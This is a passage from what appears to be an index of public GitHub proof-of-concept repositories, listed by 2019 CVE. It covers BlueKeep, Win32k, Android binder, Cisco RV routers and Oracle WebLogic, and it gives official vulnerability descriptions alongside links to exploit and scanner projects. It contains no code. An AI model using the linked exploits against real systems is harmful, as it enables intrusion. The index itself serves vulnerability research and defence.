[cbwang505/CVE-2019-0708-EXP-Windows](https://github.com/cbwang505/CVE-2019-0708-EXP-Windows) +- [eastmountyxz/CVE-2019-0708-Windows](https://github.com/eastmountyxz/CVE-2019-0708-Windows) +- [RICSecLab/CVE-2019-0708](https://github.com/RICSecLab/CVE-2019-0708) +- [JSec1337/Scanner-CVE-2019-0708](https://github.com/JSec1337/Scanner-CVE-2019-0708) +- [nochemax/bLuEkEeP-GUI](https://github.com/nochemax/bLuEkEeP-GUI) +- [AaronCaiii/CVE-2019-0708-POC](https://github.com/AaronCaiii/CVE-2019-0708-POC) +- [DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit](https://github.com/DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit) +- [go-bi/CVE-2019-0708-EXP-Windows](https://github.com/go-bi/CVE-2019-0708-EXP-Windows) +- [CircuitSoul/CVE-2019-0708](https://github.com/CircuitSoul/CVE-2019-0708) +- [pywc/CVE-2019-0708](https://github.com/pywc/CVE-2019-0708) +- [bibo318/kali-CVE-2019-0708-lab](https://github.com/bibo318/kali-CVE-2019-0708-lab) +- [lisinan988/CVE-2019-0708-scan](https://github.com/lisinan988/CVE-2019-0708-scan) +- [offensity/CVE-2019-0708](https://github.com/offensity/CVE-2019-0708) +- [CPT-Jack-A-Castle/Haruster-CVE-2019-0708-Exploit](https://github.com/CPT-Jack-A-Castle/Haruster-CVE-2019-0708-Exploit) +- [Ravaan21/Bluekeep-Hunter](https://github.com/Ravaan21/Bluekeep-Hunter) +- [davidfortytwo/bluekeep](https://github.com/davidfortytwo/bluekeep) +- [tranqtruong/Detect-BlueKeep](https://github.com/tranqtruong/Detect-BlueKeep) +- [rasan2001/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708](https://github.com/rasan2001/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708) +- [adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC](https://github.com/adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC) +- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports) +- [hualy13/CVE-2019-0708-Check](https://github.com/hualy13/CVE-2019-0708-Check) + +### CVE-2019-0709 (2019-06-12) + +A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0620, CVE-2019-0722. + + +- [YHZX2013/CVE-2019-0709](https://github.com/YHZX2013/CVE-2019-0709) +- [qq431169079/CVE-2019-0709](https://github.com/qq431169079/CVE-2019-0709) +- [ciakim/CVE-2019-0709](https://github.com/ciakim/CVE-2019-0709) + +### CVE-2019-0752 (2019-04-09) + +A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0739, CVE-2019-0753, CVE-2019-0862. + + +- [ZwCreatePhoton/CVE-2019-0752](https://github.com/ZwCreatePhoton/CVE-2019-0752) + +### CVE-2019-0768 (2019-04-09) + +A security feature bypass vulnerability exists when Internet Explorer VBScript execution policy does not properly restrict VBScript under specific conditions, and to allow requests that should otherwise be ignored, aka 'Internet Explorer Security Feature Bypass Vulnerability'. This CVE ID is unique from CVE-2019-0761. + + +- [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit) + +### CVE-2019-0785 (2019-07-15) + +A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server, aka 'Windows DHCP Server Remote Code Execution Vulnerability'. + + +- [Jaky5155/CVE-2019-0785](https://github.com/Jaky5155/CVE-2019-0785) + +### CVE-2019-0803 (2019-04-09) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0859. + + +- [Iamgublin/CVE-2019-0803](https://github.com/Iamgublin/CVE-2019-0803) +- [ExpLife0011/CVE-2019-0803](https://github.com/ExpLife0011/CVE-2019-0803) + +### CVE-2019-0808 (2019-04-09) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797. + + +- [ze0r/cve-2019-0808-poc](https://github.com/ze0r/cve-2019-0808-poc) +- [rakesh143/CVE-2019-0808](https://github.com/rakesh143/CVE-2019-0808) +- [exodusintel/CVE-2019-0808](https://github.com/exodusintel/CVE-2019-0808) +- [bb33bb/CVE-2019-0808-32-64-exp](https://github.com/bb33bb/CVE-2019-0808-32-64-exp) + +### CVE-2019-0841 (2019-04-09) + +An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0730, CVE-2019-0731, CVE-2019-0796, CVE-2019-0805, CVE-2019-0836. + + +- [rogue-kdc/CVE-2019-0841](https://github.com/rogue-kdc/CVE-2019-0841) +- [likekabin/CVE-2019-0841](https://github.com/likekabin/CVE-2019-0841) +- [0x00-0x00/CVE-2019-0841-BYPASS](https://github.com/0x00-0x00/CVE-2019-0841-BYPASS) +- [mappl3/CVE-2019-0841](https://github.com/mappl3/CVE-2019-0841) + +### CVE-2019-0859 (2019-04-09) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0803. + + +- [Sheisback/CVE-2019-0859-1day-Exploit](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit) + +### CVE-2019-0887 (2019-07-15) + +A remote code execution vulnerability exists in Remote Desktop Services - formerly known as Terminal Services - when an authenticated attacker abuses clipboard redirection, aka 'Remote Desktop Services Remote Code Execution Vulnerability'. + + +- [qianshuidewajueji/CVE-2019-0887](https://github.com/qianshuidewajueji/CVE-2019-0887) +- [t43Wiu6/CVE-2019-0887](https://github.com/t43Wiu6/CVE-2019-0887) + +### CVE-2019-0888 (2019-06-12) + +A remote code execution vulnerability exists in the way that ActiveX Data Objects (ADO) handle objects in memory, aka 'ActiveX Data Objects (ADO) Remote Code Execution Vulnerability'. + + +- [sophoslabs/CVE-2019-0888](https://github.com/sophoslabs/CVE-2019-0888) + +### CVE-2019-0986 (2019-06-12) + +An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks, aka 'Windows User Profile Service Elevation of Privilege Vulnerability'. + + +- [padovah4ck/CVE-2019-0986](https://github.com/padovah4ck/CVE-2019-0986) + +### CVE-2019-905 +- [xtafnull/CMS-made-simple-sqli-python3](https://github.com/xtafnull/CMS-made-simple-sqli-python3) + +### CVE-2019-1006 (2019-07-15) + +An authentication bypass vulnerability exists in Windows Communication Foundation (WCF) and Windows Identity Foundation (WIF), allowing signing of SAML tokens with arbitrary symmetric keys, aka 'WCF/WIF SAML Token Authentication Bypass Vulnerability'. + + +- [521526/CVE-2019-1006](https://github.com/521526/CVE-2019-1006) + +### CVE-2019-1040 (2019-06-12) + +A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection, aka 'Windows NTLM Tampering Vulnerability'. + + +- [Ridter/CVE-2019-1040](https://github.com/Ridter/CVE-2019-1040) +- [Ridter/CVE-2019-1040-dcpwn](https://github.com/Ridter/CVE-2019-1040-dcpwn) +- [lazaars/UltraRealy_with_CVE-2019-1040](https://github.com/lazaars/UltraRealy_with_CVE-2019-1040) +- [fox-it/cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) +- [QAX-A-Team/dcpwn](https://github.com/QAX-A-Team/dcpwn) + +### CVE-2019-1064 (2019-06-12) + +An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. + + +- [RythmStick/CVE-2019-1064](https://github.com/RythmStick/CVE-2019-1064) +- [0x00-0x00/CVE-2019-1064](https://github.com/0x00-0x00/CVE-2019-1064) +- [attackgithub/CVE-2019-1064](https://github.com/attackgithub/CVE-2019-1064) + +### CVE-2019-1068 (2019-07-15) + +A remote code execution vulnerability exists in Microsoft SQL Server when it incorrectly handles processing of internal functions, aka 'Microsoft SQL Server Remote Code Execution Vulnerability'. + + +- [Vulnerability-Playground/CVE-2019-1068](https://github.com/Vulnerability-Playground/CVE-2019-1068) + +### CVE-2019-1069 (2019-06-12) + +An elevation of privilege vulnerability exists in the way the Task Scheduler Service validates certain file operations, aka 'Task Scheduler Elevation of Privilege Vulnerability'. + + +- [S3cur3Th1sSh1t/SharpPolarBear](https://github.com/S3cur3Th1sSh1t/SharpPolarBear) + +### CVE-2019-1083 (2019-07-15) + +A denial of service vulnerability exists when Microsoft Common Object Runtime Library improperly handles web requests, aka '.NET Denial of Service Vulnerability'. + + +- [stevenseeley/HowCVE-2019-1083Works](https://github.com/stevenseeley/HowCVE-2019-1083Works) + +### CVE-2019-1096 (2019-07-15) + +An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'. + + +- [CrackerCat/cve-2019-1096-poc](https://github.com/CrackerCat/cve-2019-1096-poc) + +### CVE-2019-1108 (2019-07-29) + +An information disclosure vulnerability exists when the Windows RDP client improperly discloses the contents of its memory, aka 'Remote Desktop Protocol Client Information Disclosure Vulnerability'. + + +- [Lanph3re/cve-2019-1108](https://github.com/Lanph3re/cve-2019-1108) + +### CVE-2019-1125 (2019-09-03) + +An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries.\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to elevate user rights directly, but it could be used to obtain information that could be used to try to compromise the affected system further.\nOn January 3, 2018, Microsoft released an advisory and security updates related to a newly-discovered class of hardware vulnerabilities (known as Spectre) involving speculative execution side channels that affect AMD, ARM, and Intel CPUs to varying degrees. This vulnerability, released on August 6, 2019, is a variant of the Spectre Variant 1 speculative execution side channel vulnerability and has been assigned CVE-2019-1125.\nMicrosoft released a security update on July 9, 2019 that addresses the vulnerability through a software change that mitigates how the CPU speculatively accesses memory. Note that this vulnerability does not require a microcode update from your device OEM.\n + + +- [bitdefender/swapgs-attack-poc](https://github.com/bitdefender/swapgs-attack-poc) + +### CVE-2019-1132 (2019-07-29) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. + + +- [Vlad-tri/CVE-2019-1132](https://github.com/Vlad-tri/CVE-2019-1132) +- [petercc/CVE-2019-1132](https://github.com/petercc/CVE-2019-1132) + +### CVE-2019-1181 (2019-08-14) + +A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\nTo exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP.\nThe update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.\n + + +- [major203/cve-2019-1181](https://github.com/major203/cve-2019-1181) + +### CVE-2019-1215 (2019-09-11) + +An elevation of privilege vulnerability exists in the way that ws2ifsl.sys (Winsock) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1253, CVE-2019-1278, CVE-2019-1303. + + +- [bluefrostsecurity/CVE-2019-1215](https://github.com/bluefrostsecurity/CVE-2019-1215) + +### CVE-2019-1218 (2019-08-14) + +A spoofing vulnerability exists in the way Microsoft Outlook iOS software parses specifically crafted email messages. An authenticated attacker could exploit the vulnerability by sending a specially crafted email message to a victim.\nThe attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user.\nThe security update addresses the vulnerability by correcting how Outlook iOS parses specially crafted email messages.\n + + +- [d0gukank/CVE-2019-1218](https://github.com/d0gukank/CVE-2019-1218) + +### CVE-2019-1221 (2019-09-11) + +A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. + + +- [ZwCreatePhoton/CVE-2019-1221](https://github.com/ZwCreatePhoton/CVE-2019-1221) + +### CVE-2019-1253 (2019-09-11) + +An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1215, CVE-2019-1278, CVE-2019-1303. + + +- [rogue-kdc/CVE-2019-1253](https://github.com/rogue-kdc/CVE-2019-1253) +- [likekabin/CVE-2019-1253](https://github.com/likekabin/CVE-2019-1253) +- [padovah4ck/CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253) +- [sgabe/CVE-2019-1253](https://github.com/sgabe/CVE-2019-1253) + +### CVE-2019-1315 (2019-10-10) + +An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles hard links, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1339, CVE-2019-1342. + + +- [Mayter/CVE-2019-1315](https://github.com/Mayter/CVE-2019-1315) + +### CVE-2019-1332 (2019-12-10) + +A cross-site scripting (XSS) vulnerability exists when Microsoft SQL Server Reporting Services (SSRS) does not properly sanitize a specially-crafted web request to an affected SSRS server, aka 'Microsoft SQL Server Reporting Services XSS Vulnerability'. + + +- [mbadanoiu/CVE-2019-1332](https://github.com/mbadanoiu/CVE-2019-1332) + +### CVE-2019-1351 (2020-01-24) + +A tampering vulnerability exists when Git for Visual Studio improperly handles virtual drive paths, aka 'Git for Visual Studio Tampering Vulnerability'. + + +- [JonasDL/PruebaCVE20191351](https://github.com/JonasDL/PruebaCVE20191351) + +### CVE-2019-1367 (2019-09-23) + +A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221. + + +- [mandarenmanman/CVE-2019-1367](https://github.com/mandarenmanman/CVE-2019-1367) + +### CVE-2019-1385 (2019-11-12) + +An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files.To exploit this vulnerability, an authenticated attacker would need to run a specially crafted application to elevate privileges.The security update addresses the vulnerability by correcting how AppX Deployment Extensions manages privileges., aka 'Windows AppX Deployment Extensions Elevation of Privilege Vulnerability'. + + +- [0x413x4/CVE-2019-1385](https://github.com/0x413x4/CVE-2019-1385) + +### CVE-2019-1388 (2019-11-12) + +An elevation of privilege vulnerability exists in the Windows Certificate Dialog when it does not properly enforce user privileges, aka 'Windows Certificate Dialog Elevation of Privilege Vulnerability'. + + +- [jas502n/CVE-2019-1388](https://github.com/jas502n/CVE-2019-1388) +- [jaychouzzk/CVE-2019-1388](https://github.com/jaychouzzk/CVE-2019-1388) +- [sv3nbeast/CVE-2019-1388](https://github.com/sv3nbeast/CVE-2019-1388) +- [nobodyatall648/CVE-2019-1388](https://github.com/nobodyatall648/CVE-2019-1388) +- [suprise4u/CVE-2019-1388](https://github.com/suprise4u/CVE-2019-1388) + +### CVE-2019-1402 (2019-11-12) + +An information disclosure vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka 'Microsoft Office Information Disclosure Vulnerability'. + + +- [lauxjpn/CorruptQueryAccessWorkaround](https://github.com/lauxjpn/CorruptQueryAccessWorkaround) + +### CVE-2019-1405 (2019-11-12) + +An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly allows COM object creation, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'. + + +- [apt69/COMahawk](https://github.com/apt69/COMahawk) + +### CVE-2019-1422 (2019-11-12) + +An elevation of privilege vulnerability exists in the way that the iphlpsvc.dll handles file creation allowing for a file overwrite, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1420, CVE-2019-1423. + + +- [ze0r/cve-2019-1422](https://github.com/ze0r/cve-2019-1422) + +### CVE-2019-1458 (2019-12-10) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. + + +- [piotrflorczyk/cve-2019-1458_POC](https://github.com/piotrflorczyk/cve-2019-1458_POC) +- [rip1s/CVE-2019-1458](https://github.com/rip1s/CVE-2019-1458) +- [Eternit7/CVE-2019-1458](https://github.com/Eternit7/CVE-2019-1458) + +### CVE-2019-1476 (2019-12-10) + +An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1483. + + +- [sgabe/CVE-2019-1476](https://github.com/sgabe/CVE-2019-1476) + +### CVE-2019-1579 (2019-07-19) + +Remote Code Execution in PAN-OS 7.1.18 and earlier, PAN-OS 8.0.11-h1 and earlier, and PAN-OS 8.1.2 and earlier with GlobalProtect Portal or GlobalProtect Gateway Interface enabled may allow an unauthenticated remote attacker to execute arbitrary code. + + +- [securifera/CVE-2019-1579](https://github.com/securifera/CVE-2019-1579) +- [Elsfa7-110/CVE-2019-1579](https://github.com/Elsfa7-110/CVE-2019-1579) + +### CVE-2019-1652 (2019-01-24) + +A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability. + + +- [0x27/CiscoRV320Dump](https://github.com/0x27/CiscoRV320Dump) + +### CVE-2019-1653 (2019-01-24) + +A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability. + + +- [dubfr33/CVE-2019-1653](https://github.com/dubfr33/CVE-2019-1653) +- [shaheemirza/CiscoSpill](https://github.com/shaheemirza/CiscoSpill) +- [ibrahimzx/CVE-2019-1653](https://github.com/ibrahimzx/CVE-2019-1653) +- [elzerjp/nuclei-CiscoRV320Dump-CVE-2019-1653](https://github.com/elzerjp/nuclei-CiscoRV320Dump-CVE-2019-1653) + +### CVE-2019-1663 (2019-02-28) + +A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. + + +- [StealYourCode/CVE-2019-1663](https://github.com/StealYourCode/CVE-2019-1663) +- [abrumsen/CVE-2019-1663](https://github.com/abrumsen/CVE-2019-1663) +- [WolffCorentin/CVE-2019-1663-Binary-Analysis](https://github.com/WolffCorentin/CVE-2019-1663-Binary-Analysis) + +### CVE-2019-1698 (2019-02-21) + +A vulnerability in the web-based user interface of Cisco Internet of Things Field Network Director (IoT-FND) Software could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by importing a crafted XML file with malicious entries, which could allow the attacker to read files within the affected application. Versions prior to 4.4(0.26) are affected. + + +- [raytran54/CVE-2019-1698](https://github.com/raytran54/CVE-2019-1698) + +### CVE-2019-1759 (2019-03-28) + +A vulnerability in access control list (ACL) functionality of the Gigabit Ethernet Management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to reach the configured IP addresses on the Gigabit Ethernet Management interface. The vulnerability is due to a logic error that was introduced in the Cisco IOS XE Software 16.1.1 Release, which prevents the ACL from working when applied against the management interface. An attacker could exploit this issue by attempting to access the device via the management interface. + + +- [r3m0t3nu11/CVE-2019-1759-csrf-js-rce](https://github.com/r3m0t3nu11/CVE-2019-1759-csrf-js-rce) + +### CVE-2019-1821 (2019-05-16) + +A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system. + + +- [k8gege/CiscoExploit](https://github.com/k8gege/CiscoExploit) + +### CVE-2019-1881 (2019-06-05) + +A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device. For more information about CSRF attacks and potential mitigations, see Understanding Cross-Site Request Forgery Threat Vectors. + + +- [Shadawks/Strapi-CVE-2019-1881](https://github.com/Shadawks/Strapi-CVE-2019-1881) + +### CVE-2019-2107 (2019-07-08) + +In ihevcd_parse_pps of ihevcd_parse_headers.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-130024844. + + +- [CrackerCat/CVE-2019-2107](https://github.com/CrackerCat/CVE-2019-2107) +- [infiniteLoopers/CVE-2019-2107](https://github.com/infiniteLoopers/CVE-2019-2107) + +### CVE-2019-2196 (2019-11-13) + +In Download Provider, there is possible SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-135269143 + + +- [IOActive/AOSP-DownloadProviderDbDumperSQLiLimit](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiLimit) + +### CVE-2019-2198 (2019-11-13) + +In Download Provider, there is a possible SQL injection vulnerability. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-135270103 + + +- [IOActive/AOSP-DownloadProviderDbDumperSQLiWhere](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiWhere) + +### CVE-2019-2205 (2019-11-13) + +In ProxyResolverV8::SetPacScript of proxy_resolver_v8.cc, there is a possible memory corruption due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-139806216 + + +- [aemmitt-ns/pacpoc](https://github.com/aemmitt-ns/pacpoc) + +### CVE-2019-2215 (2019-10-11) + +A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095 + + +- [timwr/CVE-2019-2215](https://github.com/timwr/CVE-2019-2215) +- [raystyle/CVE-2019-2215](https://github.com/raystyle/CVE-2019-2215) +- [kangtastic/cve-2019-2215](https://github.com/kangtastic/cve-2019-2215) +- [ATorNinja/CVE-2019-2215](https://github.com/ATorNinja/CVE-2019-2215) +- [LIznzn/CVE-2019-2215](https://github.com/LIznzn/CVE-2019-2215) +- [DimitriFourny/cve-2019-2215](https://github.com/DimitriFourny/cve-2019-2215) +- [qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215](https://github.com/qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215) +- [sharif-dev/AndroidKernelVulnerability](https://github.com/sharif-dev/AndroidKernelVulnerability) +- [c3r34lk1ll3r/CVE-2019-2215](https://github.com/c3r34lk1ll3r/CVE-2019-2215) +- [Byte-Master-101/CVE-2019-2215](https://github.com/Byte-Master-101/CVE-2019-2215) +- [mufidmb38/CVE-2019-2215](https://github.com/mufidmb38/CVE-2019-2215) +- [CrackerCat/Rootsmart-v2.0](https://github.com/CrackerCat/Rootsmart-v2.0) +- [enceka/cve-2019-2215-3.18](https://github.com/enceka/cve-2019-2215-3.18) +- [elbiazo/CVE-2019-2215](https://github.com/elbiazo/CVE-2019-2215) +- [stevejubx/CVE-2019-2215](https://github.com/stevejubx/CVE-2019-2215) +- [willboka/CVE-2019-2215-HuaweiP20Lite](https://github.com/willboka/CVE-2019-2215-HuaweiP20Lite) +- [mutur4/CVE-2019-2215](https://github.com/mutur4/CVE-2019-2215) +- [R0rt1z2/huawei-unlock](https://github.com/R0rt1z2/huawei-unlock) +- [raymontag/CVE-2019-2215](https://github.com/raymontag/CVE-2019-2215) +- [XiaozaYa/CVE-2019-2215](https://github.com/XiaozaYa/CVE-2019-2215) + +### CVE-2019-2525 (2019-01-16) + +Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are prior to 5.2.24 and prior to 6.0.2. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 5.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N). + + +- [Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548](https://github.com/Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548) +- [wotmd/VirtualBox-6.0.0-Exploit-1-day](https://github.com/wotmd/VirtualBox-6.0.0-Exploit-1-day) + +### CVE-2019-2615 (2019-04-23) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N). + + +- [chiaifan/CVE-2019-2615](https://github.com/chiaifan/CVE-2019-2615) + +### CVE-2019-2618 (2019-04-23) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 5.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N). + + +- [pyn3rd/CVE-2019-2618](https://github.com/pyn3rd/CVE-2019-2618) +- [jas502n/cve-2019-2618](https://github.com/jas502n/cve-2019-2618) +- [wsfengfan/CVE-2019-2618-](https://github.com/wsfengfan/CVE-2019-2618-) +- [dr0op/WeblogicScan](https://github.com/dr0op/WeblogicScan) +- [he1dan/cve-2019-2618](https://github.com/he1dan/cve-2019-2618) +- [ianxtianxt/cve-2019-2618](https://github.com/ianxtianxt/cve-2019-2618) +- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner) + +### CVE-2019-2725 (2019-04-26) + +Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [shack2/javaserializetools](https://github.com/shack2/javaserializetools) +- [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961) +- [tobechenghuai/CNTA-2019-0014xCVE-2019-2725](https://github.com/tobechenghuai/CNTA-2019-0014xCVE-2019-2725) +- [lasensio/cve-2019-2725](https://github.com/lasensio/cve-2019-2725) +- [davidmthomsen/CVE-2019-2725](https://github.com/davidmthomsen/CVE-2019-2725) +- 